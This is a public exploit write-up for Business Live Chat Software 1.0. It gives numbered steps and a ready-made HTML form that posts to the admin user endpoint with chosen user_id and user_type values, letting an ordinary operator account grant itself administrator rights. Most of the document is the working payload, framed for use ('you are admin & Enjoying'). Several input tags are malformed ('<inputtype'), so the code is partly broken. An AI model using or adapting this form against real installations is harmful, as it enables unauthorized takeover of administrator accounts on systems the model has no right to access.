# Exploit Title: Business Live Chat Software 1.0 - Cross-Site Request Forgery (Add Admin)# Description: Operator Can Change Role User Type to admin# Date: 2020-02-26# Exploit Author: Meisam Monsef# Vendor Homepage: https://www.bdtask.com/business-live-chat-software.php# Version: V-1.0# Tested on: ubuntu
Exploit :1- please login or create account
2-open exploit.html in browser
3- change you user idinputfor Change Role User Type to admin
4- fill input data (fname - lname - email)5- click Update Button
6- logout account
7- login again you are admin & Enjoying
<form action="https://TARGET/admin/user/users/create"
enctype="multipart/form-data" method="post" accept-charset="utf-8">
user_id :<inputtype="text" name="user_id" value="1"><!-- change your user_id --><br>
fname :<inputtype="text" name="fname" value=""/><!-- fill your first name --><br>
lname :<inputtype="text" name="lname" value=""/><!-- fill your last name --><br>
email :<inputtype="text" name="email" value=""/><!-- fill your email --><br>
user_type :<inputtype="text" name="user_type" value="1"/><br>
status :<inputtype="text" name="status" value="1"/><br><button type="submit">Update</button></form>
